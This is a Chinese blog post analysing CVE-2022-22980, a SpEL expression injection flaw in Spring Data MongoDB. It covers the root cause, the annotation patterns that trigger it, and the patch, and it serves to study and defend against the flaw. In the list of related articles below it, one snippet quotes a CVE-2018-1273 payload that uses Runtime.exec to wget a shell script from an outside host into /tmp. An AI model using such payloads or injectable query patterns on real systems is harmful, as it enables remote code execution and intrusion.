『Java CVE』CVE-2022-22980: Spring Data MongoDB SpEL 注入

已于 2022-10-10 15:57:50 修改
阅读量1.4k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: # CVE 文章标签: mongodb spring java web安全 spel
于 2022-08-09 11:31:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/126244053
本文深入分析了Spring Data MongoDB中的CVE-2022-22980漏洞,详细介绍了其影响版本、工作原理、复现步骤及修复方案。读者将了解到如何利用恶意注解触发SpEL表达式注入。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

影响版本

Spring Data MongoDB: 3.3.0-3.3.4、3.4.0

漏洞原理

使用@Query或@Aggregation注解进行查询时,通过占位符获取输入参数可能会触发SpEL表达式解析

漏洞复现

环境配置

使用三梦师傅的环境

https://github.com/threedr3am/learnjavabug/tree/master/spring/spring-data-mongodb-spel-CVE-2022-22980

PoC

在这里插入图片描述

代码审计

demo里面构造了使用@query注解查询,参数直接通过注解处理,注解构造成以下格式

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2boVeEBW-1660015540615)(CVE-2022-22980/image-20220803101116357.png)]

来到ParameterBindingJsonReader.bindableValueFor()处理注解,,因为是json形式,if判断通过,然后正则匹配?#{xx}:#{xx}

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qiVQgQbe-1660015540616)(CVE-2022-22980/image-20220803103114373.png)]

如果匹配成功,再查看占位符的值是不是?\d+的形式

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HmGKH4JI-1660015540616)(CVE-2022-22980/image-20220803103320481.png)]

如果是就进入evaluateExpression触发SpEL解析,这里完成了replace替换成我们输入的参数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fDUFuAWA-1660015540617)(CVE-2022-22980/image-20220803104538378.png)]

最后在默认解析器解析,这里可以完成所有的SpEL功能

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yAaP3iKW-1660015540617)(CVE-2022-22980/image-20220803104655675.png)]

也就是说:当注解设置成以下形式时,会被判定为SpEL表达式:只要是json形式、无论键值对包含占位符即可

@Query("{xx: :#{?0} }")
@Query("{#{?0}: xx}")
@Query("{xx: ?#{?0} }")
......

同样的触发点在下面也有,UNQUOTED_STRING是判断注解值是否被引号包裹

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LPzQZho8-1660015540618)(CVE-2022-22980/image-20220803103536378.png)]

那么这样也能触发

@Query("{'xx': ':#{?0}' }")

只要构造恶意注解来进行参数赋值,就能达到SpEL注入

补丁修复分析

修改了以下文件
在这里插入图片描述
首先就是对注解的过滤判断
在这里插入图片描述
其次就是替换了SpEL解析器,更安全解析
在这里插入图片描述

影响

需要特定格式的注解才能触发SpEL注入

参考

https://tanzu.vmware.com/security/cve-2022-22980
https://github.com/spring-projects/spring-data-mongodb/commit/7c5ac764b343d45e5d0abbaba4e82395b471b4c4#diff-49274f4ac571bc3fa537d508078619cb5cf8e5c7b138db84e46794197499a95c

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://ho1aas.blog.csdn.net/article/details/126244053
版权声明:本文为原创,转载时须注明出处及本声明

Spring Data MongoDB SpEL表达式注入漏洞CVE-2022-22980)分析与利用
不忘初心,护天下安全!
06-24 2260
Spring Data for MongoDBSpring Data 项目的一部分,该项目旨在为新的数据存储提供熟悉和一致的基于Spring的编程模型,同时保留存储的特定特征和功能。 6月20日,VMware发布安全公告,修复了Spring Data MongoDB中的一个SpEL 表达式注入漏洞CVE-2022-22980),该漏洞的CVSSv3评分为8.2。 Spring Data MongoDB应用程序在对包含查询参数占位符的SpEL表达式使用@Query或@Aggr
CVE-2022-22980 SpringData MongoDB SpEL表达式注入
qq_32445755的博客
11-13 1005
SpringData是为了提供一个常见的、一致的数据访问模型,也就是说,它的目标就是为了能为所有数据库(包括关系型和非关系型)提供一致的数据操作接口,并且这些接口名非常通俗易懂,让人一看便知。它也是基于Spring框架的,即可以直接使用Spring的IoC和AOP等特性。
关于Spring Data MongoDB SpEL表达式注入漏洞CVE-2022-22980)的预警提示
Gblfy_Blog
11-05 916
注入漏洞
开源漏洞深度分析 | CVE-2022-22980 SpringData MongoDB SpEL表达式注入漏洞
LJQClqjc的博客
06-30 1698
开源漏洞深度分析 | CVE-2022-22980 SpringData MongoDB SpEL表达式注入漏洞
漏洞预警|Spring Data MongoDB SpEL表达式注入漏洞
LJQClqjc的博客
06-30 625
近日网上有关于开源项目Spring Data MongoDB 存在SpEL表达式注入的信息,棱镜七彩安全研究院对漏洞进行了POC验证。
Spring Data MongoDB 爆出 SpEL 表达式注入漏洞
murphysec的博客
06-23 1983
2022年6月20日,墨菲安全实验室监测到 Spring Data MongoDB 存在 SpEL 表达式注入漏洞Spring Data MongoDB 是基于 Spring 编程模型为 MongoDB 提供接口抽象和通用性模型。 应用程序在使用带有 SpEL 表达式的 @Query 或 @Aggregation-annotated 查询方法时,如果没有对用户输入进行过滤处理,可能会导致 SpEL 表达式注入漏洞漏洞评级:高危影响组件:org.springframework.data:spring-da
Spring Data Commons远程命令执行漏洞复现(CVE-2018-1273)
wutiangui的博客
09-10 1118
下载文件请求包:username[#this.getClass().forName(java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
开发知识点-分布式微服务技术栈 SpringCloud
aming小老弟
10-19 2848
分布式架构的一种把服务进行 拆分springcloud 解决了 服务拆分过程中的 治理问题与单体应用 进行区分(单体架构 把业务所有功能集中开发,打成一个包部署)每个模块独立开发和部署(服务集群)服务之间互相调用出现分布式技术WebserviceESBHessionDubbo异步通信 消息队列(秒杀)敏捷开发思想高内聚低耦合微服务 + 持续集成。
SpEL表达式注入漏洞分析、检查与防御
hwxiaozhi的博客
03-15 673
程序中如果使用未经校验的输入构造SpEL语句,就有可能造成SpEL表达式注入漏洞,对下游服务可能产生恶意攻击。本文介绍了SpEL表达式以及常见的SpEL注入攻击,详细地介绍了部分漏洞攻击实例以及常用的漏洞检测与防御手段。
【CTF】【cve_2022_22890】Spring Data MongoDB SpEL表达式注入漏洞
菜菜的成长
02-08 901
cve_2022_22890漏洞应用 学习下反弹shell
CVE-2022-22980 exp && 靶场.zip
最新发布
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场为安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场为学习者提供了一个安全的学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
Apache Subversion Use-After-Free漏洞CVE-2022-24070)
murphysec的博客
04-19 693
CVE-2022-24070漏洞会造成Apache Subversion下处理请求的 HTTPD 工作进程崩溃,进而导致拒绝服务,目前该漏洞已修复,建议受影响用户更新到安全版本,或下载官方补丁:https://subversion.apache.org/security/CVE-2022-24070-advisory.txt 编号       CVE-2022-24070                      标题 Apache Subversion Use-After-Free漏洞
Spring Data MongoDB SpEL表达式注入漏洞CVE-2022-22890)
Blue的博客
06-27 8228
Spring Data MongoDB 应用程序在使用带有 SpEL 表达式的 @Query 或 @Aggregation-annotated 查询方法时容易受到 SpEL 注入的影响,如果输入未经过过滤,则该表达式包含用于值绑定的查询参数占位符。v3.4.0v3.3.0 to v3.3.41.环境搭建启动环境可以看到如下界面2、环境中默认是没有crul工具,通过命令下载一个curl工具这里尝试DNslog可以看到成功回显在自己服务器上写一个反弹shell脚本,并开启服务 下载文件到tmp目录下服务开启监
JAVA中代码审计mongodb注入,在spring boot中进行mongodb审计以保存createdDate,lastModifiedDate,createdBy,lastModifiedBy...
weixin_42509914的博客
03-12 626
我使用的是spring boot,因此我没有使用任何xml文件进行配置 . 我要做的是EnableMongoAuditing保存createdDate,lastModifiedDate等,同时使用MongoRepositories保存数据 .我的模特课@Component@Document(collection = "CAPPING")public class TemporaryCapping e...
mongodb的简单使用三(结合springdata 使用遇到的坑)
PYXLY1314的专栏
01-13 875
总结springdata+mongodb开发的小经验 1、接着上一篇文章《mongodb的简单使用二(结合springdata实现增删改查)》写一下总结               a)查询制定字段的:通过这种方式  query.fields().include("userId"); Query query = new Query(); query.fields().inc
Spring Data MongoDB SpEL表达式注入漏洞安全风险通告第二次更新
smellycat000的专栏
06-23 669
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告近日,奇安信CERT监测到Spring Data MongoDB SpEL表达式注入漏洞(CVE-2022-22980),当使用@Query或@Aggregation注解进行查询时,若通过SpEL表达式中形如“?0”的占位符来进行参数赋值,同时应用程序未对用户输入进行过滤处理,则可能受到SpE...
MongoDB未授权访问漏洞及加固
七月_的博客
06-24 9429
MongoDB MongoDB 是一个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。 MongoDB 是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。 ...
CVE漏洞研究
xlsj雪松的博客
12-30 1643
Java漏洞学习
一文详解SpEL表达式注入漏洞
华为云官方博客
02-21 1384
本文介绍了SpEL表达式以及常见的SpEL注入攻击,详细地介绍了部分漏洞攻击实例以及常用的漏洞检测与防御手段。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值